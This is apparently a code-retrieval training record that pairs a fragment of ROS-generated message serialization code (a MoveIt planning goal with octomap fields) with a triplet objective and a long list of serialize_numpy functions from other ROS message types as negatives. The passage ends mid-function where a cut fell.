unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_7d3I().pack(_x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.w, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.octomap.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) 
buff.write(_get_struct_B().pack(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.binary)) _x = self.goal.planning_options.planning_scene_diff.world.octomap.octomap.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_get_struct_d().pack(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.resolution)) length = len(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data) buff.write(_struct_I.pack(length)) pattern = '<%sb'%length buff.write(self.goal.planning_options.planning_scene_diff.world.octomap.octomap.data.tostring()) _x = self buff.write(_get_struct_3BidBid().pack(_x.goal.planning_options.planning_scene_diff.is_diff, _x.goal.planning_options.plan_only, _x.goal.planning_options.look_around, _x.goal.planning_options.look_around_attempts, _x.goal.planning_options.max_safe_execution_cost, _x.goal.planning_options.replan, _x.goal.planning_options.replan_attempts, _x.goal.planning_options.replan_delay)) except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self))))) except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serialize_numpy(self, buff, numpy):\n try:\n pass\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_2d2q14dq.pack(_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret))\n _x = self.msg\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n pass\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n pass\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_struct_B.pack(self.result))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.tsp_turtles\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.conveyor_turtle\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.catch_turtle\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n length = len(self.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.position.tostring())\n length = len(self.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.velocity.tostring())\n length = len(self.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.effort.tostring())\n length = len(self.position_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.position_command.tostring())\n length = 
len(self.velocity_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.velocity_command.tostring())\n length = len(self.effort_command)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.effort_command.tostring())\n length = len(self.accelerometer)\n buff.write(_struct_I.pack(length))\n for val1 in self.accelerometer:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n length = len(self.gyro)\n buff.write(_struct_I.pack(length))\n for val1 in self.gyro:\n _x = val1\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n length = len(self.orientation)\n buff.write(_struct_I.pack(length))\n for val1 in self.orientation:\n _x = val1\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.deflection)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.deflection.tostring())\n length = len(self.deflection_velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.deflection_velocity.tostring())\n length = len(self.motor_velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_velocity.tostring())\n length = len(self.motor_current)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_current.tostring())\n length = len(self.motor_winding_current)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_winding_current.tostring())\n length = len(self.motor_sensor_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_sensor_temperature.tostring())\n length = len(self.motor_winding_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_winding_temperature.tostring())\n length = len(self.motor_housing_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_housing_temperature.tostring())\n length = len(self.board_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.board_temperature.tostring())\n length = len(self.processor_temperature)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.processor_temperature.tostring())\n length = len(self.voltage)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.voltage.tostring())\n length = len(self.led_color)\n buff.write(_struct_I.pack(length))\n for val1 in self.led_color:\n _x = val1\n buff.write(_get_struct_4f().pack(_x.r, _x.g, _x.b, _x.a))\n length = len(self.sequence_number)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(self.sequence_number.tostring())\n length = len(self.receive_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(self.receive_time.tostring())\n length = len(self.transmit_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(self.transmit_time.tostring())\n length = len(self.hardware_receive_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(self.hardware_receive_time.tostring())\n length = len(self.hardware_transmit_time)\n buff.write(_struct_I.pack(length))\n pattern = '<%sQ'%length\n buff.write(self.hardware_transmit_time.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: 
self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_ihih3i3d2i2d().pack(_x.originId, _x.originType, _x.destinationId, _x.destinationType, _x.range, _x.ts, _x.seq, _x.rxPower, _x.channel, _x.datarate, _x.prf, _x.preambleLength, _x.txGain, _x.angle))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_struct_d.pack(self.i))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_get_struct_b().pack(self.error))\n length = len(self.start_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.start_pos.tostring())\n length = len(self.target_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.target_pos.tostring())\n length = len(self.plans)\n buff.write(_struct_I.pack(length))\n for val1 in self.plans:\n _x = val1.joint\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.trajectory)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val1.trajectory.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_Q8d().pack(_x.detection_id, _x.confidence, _x.pose.pose.position.x, _x.pose.pose.position.y, _x.pose.pose.position.z, _x.pose.pose.orientation.x, _x.pose.pose.orientation.y, _x.pose.pose.orientation.z, _x.pose.pose.orientation.w))\n buff.write(self.pose.covariance.tostring())\n _x = self\n buff.write(_get_struct_5d().pack(_x.height, _x.bbox_x, _x.bbox_y, _x.bbox_w, _x.bbox_h))\n _x = self.modality\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.embed_vector)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.embed_vector.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_7q.pack(_x.s_x, _x.s_y, _x.f_x, _x.f_y, _x.step_size, _x.bias_param, _x.max_iteration))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: 
self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2B2If().pack(_x.role, _x.id, _x.local_time, _x.system_time, _x.voltage))\n buff.write(self.pos_3d.tostring())\n buff.write(self.eop_3d.tostring())\n buff.write(self.vel_3d.tostring())\n buff.write(self.angle_3d.tostring())\n buff.write(self.quaternion.tostring())\n buff.write(self.imu_gyro_3d.tostring())\n buff.write(self.imu_acc_3d.tostring())\n length = len(self.nodes)\n buff.write(_struct_I.pack(length))\n for val1 in self.nodes:\n _x = val1\n buff.write(_get_struct_2B3f().pack(_x.role, _x.id, _x.dis, _x.fp_rssi, _x.rx_rssi))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_h16fh8f().pack(_x.id, _x.age, _x.velocidad_relativa_x, _x.velocidad_relativa_y, _x.velocidad_absoluta_x, _x.velocidad_absoluta_y, _x.velocidad_absoluta_sigma_x, _x.velocidad_absoluta_sigma_y, _x.bounding_box_centro_x, _x.bounding_box_centro_y, _x.bounding_box_largo, _x.bounding_box_ancho, _x.object_box_centro_x, _x.object_box_centro_y, _x.object_box_orientacion, _x.object_box_size_x, _x.object_box_size_y, _x.clasificacion, _x.clasificacion_age, _x.clasificacion_certeza, _x.punto_cercano_x, _x.punto_cercano_y, _x.punto_referencia_x, _x.punto_referencia_y, _x.punto_referencia_sigma_x, _x.punto_referencia_sigma_y))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_12B.pack(_x.hlive, _x.hstate, _x.hfinished, _x.pressure, _x.c1, _x.c2, _x.c3, _x.c4, _x.c5, _x.c6, _x.c7, _x.c8))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n length = len(self.objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.objects:\n _v7 = val1.header\n buff.write(_struct_I.pack(_v7.seq))\n _v8 = _v7.stamp\n _x = _v8\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v7.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object_class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.confidence))\n _v9 = val1.roi\n _x = _v9\n buff.write(_struct_4IB.pack(_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % 
(type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_14d.pack(_x.u0, _x.h0, _x.vl, _x.i0, _x.wv, _x.wh, _x.wi, _x.h_stop, _x.T_gap, _x.v_max, _x.v_min, _x.h_min, _x.i_max, _x.i_min))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_ih2B().pack(_x.rcvTOW, _x.week, _x.numSV, _x.reserved1))\n length = len(self.sv)\n buff.write(_struct_I.pack(length))\n for val1 in self.sv:\n _x = val1\n buff.write(_get_struct_2dfB2bB().pack(_x.cpMes, _x.prMes, _x.doMes, _x.sv, _x.mesQI, _x.cno, _x.lli))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_6d2IB().pack(_x.position.x, _x.position.y, _x.position.z, _x.position.roll, _x.position.pitch, _x.position.yaw, _x.position.stamp.secs, _x.position.stamp.nsecs, _x.is_Known))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.canmsg\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_Bf2B2f2B2fBf().pack(_x.track_id, _x.track_lat_rate, _x.track_group_changed, _x.track_status, _x.track_angle, _x.track_range, _x.track_bridge_object, _x.track_rolling_count, _x.track_width, _x.track_range_accel, _x.track_med_range_mode, _x.track_range_rate))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.time\n buff.write(_get_struct_d().pack(_x))\n length = len(self.q_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.q_target.tostring())\n length = len(self.qd_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.qd_target.tostring())\n length = len(self.qdd_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.qdd_target.tostring())\n length = len(self.i_target)\n buff.write(_struct_I.pack(length))\n 
pattern = '<%sd'%length\n buff.write(self.i_target.tostring())\n length = len(self.m_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.m_target.tostring())\n length = len(self.q_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.q_actual.tostring())\n length = len(self.qd_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.qd_actual.tostring())\n length = len(self.i_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.i_actual.tostring())\n length = len(self.tool_acc_values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tool_acc_values.tostring())\n length = len(self.tcp_force)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tcp_force.tostring())\n length = len(self.tool_vector)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tool_vector.tostring())\n length = len(self.tcp_speed)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tcp_speed.tostring())\n _x = self.digital_input_bits\n buff.write(_get_struct_d().pack(_x))\n length = len(self.motor_temperatures)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_temperatures.tostring())\n _x = self\n buff.write(_get_struct_3d().pack(_x.controller_timer, _x.test_value, _x.robot_mode))\n length = len(self.joint_modes)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.joint_modes.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.line)\n buff.write(_struct_I.pack(length))\n for val1 in self.line:\n _x = val1\n buff.write(_get_struct_4if().pack(_x.x1, _x.y1, _x.x2, _x.y2, _x.color))\n length = len(self.circle)\n buff.write(_struct_I.pack(length))\n for val1 in self.circle:\n _x = val1\n buff.write(_get_struct_3if().pack(_x.x, _x.y, _x.radius, _x.color))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2ib6d12B().pack(_x.Timestamp_sec, _x.Timestamp_nsec, _x.IdModulo, _x.InputVolA, _x.InputVolB, _x.InputCorrA, _x.InputCorrB, _x.OutputAnlg1, _x.OutputAnlg2, _x.InputDig1, _x.InputDig2, _x.InputDig3, _x.InputDig4, _x.OutputDig1, _x.OutputDig2, _x.OutputDig3, _x.OutputDig4, _x.OutputDig5, _x.OutputDig6, _x.OutputDig7, _x.OutputDig8))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_struct_B.pack(self.type))\n _x = 
self.model\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.head_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.body_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.arm_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2B3i.pack(_x.has_laser, _x.has_extended_arms, _x.number_of_legs, _x.number_of_arms, _x.number_of_hands))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(self.thumb.tostring())\n buff.write(self.index.tostring())\n buff.write(self.middle.tostring())\n buff.write(self.ring.tostring())\n buff.write(self.little.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.red_u)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.red_u.tostring())\n length = len(self.red_v)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.red_v.tostring())\n length = len(self.yellow_u)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.yellow_u.tostring())\n length = len(self.yellow_v)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.yellow_v.tostring())\n length = len(self.green_u)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.green_u.tostring())\n length = len(self.green_v)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.green_v.tostring())\n length = len(self.purple_u)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.purple_u.tostring())\n length = len(self.purple_v)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.purple_v.tostring())\n length = len(self.orange_u)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.orange_u.tostring())\n length = len(self.orange_v)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.orange_v.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' 
when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_12d2f3d().pack(_x.position.x, _x.position.y, _x.position.z, _x.approach.x, _x.approach.y, _x.approach.z, _x.binormal.x, _x.binormal.y, _x.binormal.z, _x.axis.x, _x.axis.y, _x.axis.z, _x.width.data, _x.score.data, _x.sample.x, _x.sample.y, _x.sample.z))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_9f.pack(_x.c0.x, _x.c0.y, _x.c0.z, _x.c1.x, _x.c1.y, _x.c1.z, _x.c2.x, _x.c2.y, _x.c2.z))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3B.pack(_x.gear, _x.front_diff, _x.rear_diff))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.polygons)\n buff.write(_struct_I.pack(length))\n for val1 in self.polygons:\n _v3 = val1.stamp\n _x = _v3\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n buff.write(_struct_I.pack(val1.ID))\n buff.write(val1.parameter.tostring())\n length = len(val1.score)\n buff.write(_struct_I.pack(length))\n for val2 in val1.score:\n _x = val2\n buff.write(_struct_If.pack(_x.ID, _x.prob))\n length = len(val1.polyline)\n buff.write(_struct_I.pack(length))\n for val2 in val1.polyline:\n _x = val2\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.edge_prob))\n length = len(val1.features)\n buff.write(_struct_I.pack(length))\n for val2 in val1.features:\n _x = val2\n buff.write(_struct_3fI.pack(_x.x, _x.y, _x.z, _x.ID))\n _x = val1.energy\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.weight))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_6d2I2iB().pack(_x.x, _x.y, _x.z, _x.yaw, _x.v_des, _x.a_des, _x.t_start.secs, _x.t_start.nsecs, _x.duration.secs, _x.duration.nsecs, _x.relative))\n except struct.error as se: 
